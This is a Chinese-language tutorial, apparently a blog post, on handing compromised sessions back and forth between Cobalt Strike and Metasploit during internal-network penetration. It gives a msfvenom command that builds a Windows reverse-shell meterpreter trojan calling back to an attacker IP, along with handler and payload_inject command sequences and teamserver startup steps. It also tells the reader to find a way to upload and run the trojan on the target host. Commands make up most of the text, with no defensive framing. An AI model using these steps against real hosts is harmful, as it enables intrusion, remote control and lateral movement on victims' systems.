内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在渗透中,有时候 Cobalt Strike 会话可能会受限制,所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.


目录:

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

(2)进行监听模式.

(3)开启 Cobalt Strike 工具.

(4)添加一个监听.

(5)会话转移到 CS 中.

在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

(2)添加一个监听.

(3)生成一个程序.(木马)

(4)重新添加一个监听器.

(5)会话转移到 MSF 中.


在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

生成一个程序后面(木马):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > bgxg.exe

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第1张图片


(2)进行监听模式.

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set lhost 192.168.0.106                            # 本地 IP 地址

(5)set LPORT 4422                                     # 和后面一样的端口

(6)run

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第2张图片


(3)开启 Cobalt Strike 工具.

服务端:
 
(1)cd cs4.7        //切换为 cs 目录
 
(2)chmod a+x ./TeamServerImage         // 修改权限.
 
(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:
 
(1)cd cs4.7        // 切换为 cs 目录
 
(2)./start.sh        // 打开 客户端.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第3张图片


(4)添加一个监听.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第4张图片


(5)会话转移到 CS 中.

(1)background                // 挂起 会话.

(2)use exploit/windows/local/payload_inject

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.

(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])

(6)set DisablePayloadHandler True

(7)set PrependMigrate True

(8)sessions -l  //查看 会话 是多少则设置多少

(9)set session 1 [一般是 1(上面查看的结果)]

(10)exploit      // 进行 测试.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第5张图片

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第6张图片

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第7张图片


在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

服务端:
 
(1)cd cs4.7        //切换为 cs 目录
 
(2)chmod a+x ./TeamServerImage         // 修改权限.
 
(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:
 
(1)cd cs4.7        // 切换为 cs 目录
 
(2)./start.sh        // 打开 客户端.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第8张图片


(2)添加一个监听.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第9张图片


(3)生成一个程序.(木马)

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第10张图片

想方法,把这个程序上传到目标主机并执行这个执行.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第11张图片


(4)重新添加一个监听器.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第12张图片


(5)会话转移到 MSF 中.

(1)msfconsole                    // 打开 MSF 工具

(2)use exploit/multi/handler                                   // 设置 监听 模块.

(3)set payload windows/meterpreter/reverse_http                // 设置 payload

(4)set lport 9999                        // 设置一个端口(和上面的监听一样的端口)

(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址

(6)exploit                              // 进行测试

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第13张图片

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第14张图片

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_第15张图片

       

       

       

你可能感兴趣的:(#,横向渗透,领域.,内网安全,领域.,#,安全测试工具领域.,网络安全,安全,网络,web安全)